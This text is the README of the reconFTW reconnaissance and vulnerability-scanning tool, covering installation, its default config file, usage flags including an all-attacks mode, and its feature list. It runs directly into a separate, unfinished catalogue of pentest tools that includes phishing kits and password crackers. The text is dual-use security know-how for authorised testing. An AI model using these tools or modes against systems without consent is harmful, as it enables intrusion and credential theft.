[Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker Image 🐳 (3 options) - Pull the image ```bash $ docker pull six2dez/reconftw:main ``` - Run the container ``` $ docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \ six2dez/reconftw:main -d example.com -r ``` However, if you wish to: 1. Dynamically modify the behaviour & function of the image 2. Build your own container 3. Build an Axiom Controller on top of the official image Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation. ## c) Terraform + Ansible Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md) # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" generate_resolvers=false proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true METADATA=true EMAILS=true DOMAIN_INFO=true IP_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true VIRTUALHOSTS=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CDN_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true PASSWORD_DICT=true PASSWORD_MIN_LENGTH=5 PASSWORD_MAX_LENGTH=14 # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DEEP_LIMIT2=1500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS="-mc all -fc 404 -ac -sf -s" # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=20 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAU_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 TLSX_THREADS=1000 # Rate limits HTTPX_RATELIMIT=150 NUCLEI_RATELIMIT=150 FFUF_RATELIMIT=0 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=5 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS="--rm-logs" # Example # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME="user" BBRF_PASSWORD="password" # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | | -q | Rate limit in requests per second | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) ## Subdomains - Passive ([amass](https://github.com/OWASP/Amass) and [github-subdomains](https://github.com/gwen001/github-subdomains)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr)) - NOERROR subdomain discovery ([dnsx](https://github.com/projectdiscovery/dnsx), more info [here](https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/)) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig)) - Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum)) ## Hosts - IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/) - CDN checker ([ipcdn](https://github.com/six2dez/ipcdn)) - WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search and filtering ([urless](https://github.com/xnl-h4ck3r/urless), [gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Rush](https://github.com/shenwei356/rush)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Ansible + Terraform deployment over AWS - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support + optional [inscope](https://github.com/tomnomnom/hacks/tree/master/inscope) support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## Support this project ### Buymeacoffee [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ### DigitalOcean referral link <a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a> ### GitHub sponsorship [Sponsor](https://github.com/sponsors/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [C99](https://api.c99.nl/) - [CIRCL](https://www.circl.lu/) - [NetworksDB](https://networksdb.io/) - [ipinfo](https://ipinfo.io/) - [hackertarget](https://hackertarget.com/) - [Censys](https://censys.io/) - [Fofa](https://fofa.info/) - [intelx](https://intelx.io/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
# Pentest Tools ![](logo.png) The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ ## TODO * [x] Directory * [ ] Browser bookmarks * [ ] Tools Usage * [ ] Virtual machine - [Windows11 Penetration Suite Toolkit](https://github.com/arch3rPro/Pentest-Windows) ## List * [Information Gathering](#information-gathering) * [Vulnerability Analysis](#vulnerability-analysis) * [Web Applications](#web-applications) * [Database Assessment](#database-assessment) * [Password Attacks](#password-attacks) * [Wireless Attacks](#Wireless-Attacks) * [Reverse Engineering](#Reverse-Engineering) * [Exploitation Tools](#exploitation-tools) * [Sniffing & Spoofng](#Sniffing-&-Spoofng) * [Maintaining Access](#maintaining-access) * [Golang Sec Tools](#Golang-Sec-Tools) * [Reporting Tools](#reporting-tools) * [Social Engineering](#Social-Engineering) * [Code Audit](#code-audit) * [Port Forwarding & Proxies](#port-forwarding--proxies) * [DevSecOps](#DevSecOps) * [RootKit](#RootKit) * [Cyber Range](#Cyber-Range) ### Information Gathering #### Domain Name * [whois](https://docs.microsoft.com/en-us/sysinternals/downloads/whois) - Windows Whois performs the registration record for the domain name or IP address that you specify. ![](svg/Windows.svg) #### Subdomain * [subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) - A fast sub domain brute tool for pentesters ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ksubdomain](https://github.com/boy-hack/ksubdomain) - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [OneForAll](https://github.com/shmilylty/OneForAll) - 👊 OneForAll is a powerful subdomain integration tool ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [LayerDomainFinder](https://github.com/euphrat1ca/LayerDomainFinder) - a subdomains enumeration tool by Layer ![](svg/Windows.svg) #### Google Hacking * [GHDB](https://www.exploit-db.com/google-hacking-database/) - Google Hack Database ![](svg/chrome.svg) * [SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/) - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project ![](svg/Windows.svg) * [Katana](https://github.com/adnane-X-tebbaa/Katana) - A Python Tool For google Hacking ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [uDork](https://github.com/m3n0sd0n4ld/uDork) - uDork is a script written in Bash Scripting that uses advanced Google search techniques to obtain sensitive information in files or directories, find IoT devices, detect versions of web applications, and so on. ![](svg/linux.svg)![](svg/mac.svg) * [GooFuzz](https://github.com/m3n0sd0n4ld/GooFuzz) - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking). ![](svg/linux.svg)![](svg/mac.svg) * [Pagodo](https://github.com/opsdisk/pagodo) - pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching . ![](svg/linux.svg)![](svg/mac.svg) #### Github * [GitHacker](https://github.com/WangYihang/GitHacker) - 🕷️ A Git source leak exploit tool that restores the entire Git repository, including data from stash, for white-box auditing and analysis of developers' mind. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GitGraber](https://github.com/hisxo/gitGraber) - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) #### SVN * [svnExploit](https://github.com/admintony/svnExploit) - Support for SVN source code disclosure of full version and Dump it. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [SvnHack](https://github.com/callmefeifei/SvnHack) - SvnHack is a SVN folder disclosure exploit. :lock: #### Port Scan * [Nmap | Zenmap](https://nmap.org/) - Free and open source utility for network discovery and security auditing * [Masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously * [Ports](https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md) - Common service ports and exploitations * [Goby](https://gobies.org/) - Attack surface mapping * [Goscan](https://github.com/marco-lancini/goscan) - Interactive Network Scanner * [NimScan](https://github.com/elddy/NimScan) - 🚀 Fast Port Scanner 🚀 * [RustScan](https://github.com/RustScan/RustScan) - 🤖 The Modern Port Scanner 🤖 * [TXPortMap](https://github.com/4dogs-cn/TXPortMap) - Port Scanner & Banner Identify From TianXiang * [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools #### OSINT * [theHarvester](https://github.com/laramies/theHarvester)- E-mails, subdomains and names Harvester - OSINT * [SpiderFoot](https://github.com/smicallef/spiderfoot) - SpiderFoot automates OSINT for threat intelligence and mapping your attack surface. * [Recon-ng](https://github.com/lanmaster53/recon-ng) - Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. ![](svg/linux.svg) * [FOCA](https://github.com/ElevenPaths/FOCA) - Tool to find metadata and hidden information in the documents. * [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery * [Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys. * [EmailHarvester](https://github.com/maldevel/EmailHarvester) - Email addresses harvester * [Finalrecon](https://github.com/thewhiteh4t/FinalRecon) - The Last Web Recon Tool You'll Need. * [LittleBrother](https://github.com/lulz3xploit/LittleBrother) - Information gathering (OSINT) on a person (EU) * [Octosuite](https://github.com/rly0nheart/octosuite) - Advanced Github OSINT Framework ### Phishing * [gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit * [AdvPhishing](https://github.com/Ignitetch/AdvPhishing) - This is Advance Phishing Tool ! OTP PHISHING * [SocialFish](https://github.com/UndeadSec/SocialFish) - Educational Phishing Tool & Information Collector * [Zphisher](https://github.com/htr-tech/zphisher) - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit ! * [Nexphisher](https://github.com/htr-tech/nexphisher) - Advanced Phishing tool for Linux & Termux ### Vulnerability Analysis #### Fuzzing #### Vulnerability Scanner * [Struts-Scan](https://github.com/Lucifer1993/struts-scan) - Struts2 vulnerability detection and utilization tools * [Nikto](https://github.com/sullo/nikto) - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items * [W3af](https://github.com/andresriancho/w3af/) - Web application attack and audit framework, the open source web vulnerability scanner * [Openvas](http://www.openvas.org/) - The world's most advanced Open Source vulnerability scanner and manager * [Openvas Docker](https://github.com/mikesplain/openvas-docker) * [Archery](https://github.com/archerysec/archerysec) - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities * [Taipan](https://github.com/enkomio/Taipan) - Web application vulnerability scanner * [Arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework * [Nuclei](https://github.com/projectdiscovery/nuclei) - Fast and customizable vulnerability scanner based on simple YAML based DSL. * [Xray](https://github.com/chaitin/xray) - A passive-vulnerability-scanner Tool. * [SiteScan](https://github.com/kracer127/SiteScan) - AllinOne Website Information Gathering Tools for pentest. * [Banli](Github.com/Goqi/Banli) - High-risk asset identification and high-risk vulnerability scanner. ![](svg/Windows.svg) * [vscan](https://github.com/veo/vscan) - Open Source Vulnerability Scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Wapiti](https://github.com/wapiti-scanner/wapiti) - Web vulnerability scanner written in Python3. ### Web Applications #### CMS & Framwork Identification * [AngelSword](https://github.com/Lucifer1993/AngelSword) - CMS vulnerability detection framework :lock: * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner ![](svg/linux.svg) * [Wappalyzer](https://github.com/AliasIO/Wappalyzer) - Cross-platform utility that uncovers the technologies used on websites ![](svg/chrome.svg) * [Whatruns](https://www.whatruns.com/) - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)![](svg/chrome.svg) * [WhatCMS](https://github.com/HA71/WhatCMS) - CMS Detection and Exploit Kit based on Whatcms.org API * [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs * [EHole](https://github.com/EdgeSecurityTeam/EHole) - CMS Detection for RedTeam ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) > Online Tools * [Yunsee](http://www.yunsee.cn/finger.html) - Online website for to find the CMS footprint * [Bugscaner](http://whatweb.bugscaner.com/look/) - A simple online fingerprint identification system that supports hundreds of cms source code recognition * [WhatCMS online](https://whatcms.org/) - CMS Detection and Exploit Kit website Whatcms.org * [TideFinger](http://finger.tidesec.com/) - Fingerprinter Tool from TideSec Team * [360finger-p](https://fp.shuziguanxing.com/) - Fingerprinter Tool from 360 Team #### Web Applications Proxies * [Burpsuite](https://portswigger.net/) - Burpsuite is a graphical tool for testing Web application security ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ZAP](https://github.com/zaproxy/zaproxy) One of the world’s most popular free security tools ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Broxy](https://github.com/rhaidiz/broxy) - An HTTP/HTTPS intercept proxy written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Hetty](https://github.com/dstotijn/hetty) - An HTTP toolkit for security research. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) #### web browser extension * [Hack-Tools](https://github.com/LasCC/Hack-Tools) - The all-in-one Red Team extension for Web Pentester 🛠 #### Web Crawlers & Directory Brute Force * [Dirbrute](https://github.com/Xyntax/DirBrute) - Multi-thread WEB directory blasting tool (with dics inside) :lock: * [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Dirbuster](https://sourceforge.net/projects/dirbuster/) - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Gobuster](https://github.com/OJ/gobuster) Directory/File, DNS and VHost busting tool written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [WebPathBrute](https://github.com/7kbstorm/7kbscan-WebPathBrute) - Web path Bruter. ![](svg/Windows.svg) * [wfuzz](https://github.com/xmendez/wfuzz) - Web application fuzzer ![](svg/Windows.svg)![](svg/linux.svg) * [Dirmap](https://github.com/H4ckForJob/dirmap) - An advanced web directory & file scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian. #### Docker Scanners * [Fuxi-Scanner](https://github.com/jeffzh3ng/Fuxi-Scanner) - open source network security vulnerability scanner, it comes with multiple functions. ![](svg/Docker.svg) * [Xunfeng](https://github.com/ysrc/xunfeng) - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets. ![](svg/Docker.svg) * [WebMap](https://github.com/SabyasachiRana/WebMap) - Nmap Web Dashboard and Reporting. ![](svg/Docker.svg) ### Database Assessment ### Password Attacks * [Hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack * [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer * [Sparta](https://github.com/SECFORCE/sparta) - Network Infrastructure Penetration Testing Tool. ![](svg/linux.svg) * [Hashcat](https://github.com/hashcat/hashcat) - World's fastest and most advanced password recovery utility * [Patator](https://github.com/lanjelot/patator) - 